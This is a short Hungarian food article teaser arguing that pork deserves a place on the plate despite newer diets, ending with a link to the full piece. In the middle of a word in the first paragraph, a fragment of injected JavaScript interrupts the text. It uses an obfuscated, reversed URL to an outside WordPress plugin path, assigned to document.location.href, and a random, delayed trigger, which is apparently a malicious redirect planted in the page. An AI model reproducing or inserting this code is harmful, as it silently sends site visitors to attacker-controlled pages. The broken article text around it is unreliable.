Mint minden ételre, úgy a vöröshúsok fogyasztására is igaz az, hogy mindent szabad, csak mértékkel. A vöröshúsok között is vannak azonban olyan húsfélék, amelyek az elmúlt években trónfosztáson mentek keresztül. Míg a marha, a strucc és a bölényhús kifejezetten kívánatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosnak számít, addig a disznóhús egy kis időre kiesett a pixisből. Kalóriabomba vagy sovány finomság? A disznóhús háttérbe szorulása talán az újfajta étrendek térhódításának köszönhető, amelyek első sorban azért száműzik a tányérról a disznóból készült húsokat, mert magas zsírtartalmuk hamar a szív-és érrendszer kárára megy. A helyzet azonban az, hogy ez minden másféle ételre és húsforrásra igaz. Ha korlátlan mennyiséget fogyasztunk…
A cikk folytatódik: http://gasztrokalandok.co.hu/hogyan-keszul-/2016/03/18/harom-dolog-amiert-a-serteshus-nem-hianyozhat-a-tanyerodrol.html
- Hirdetés -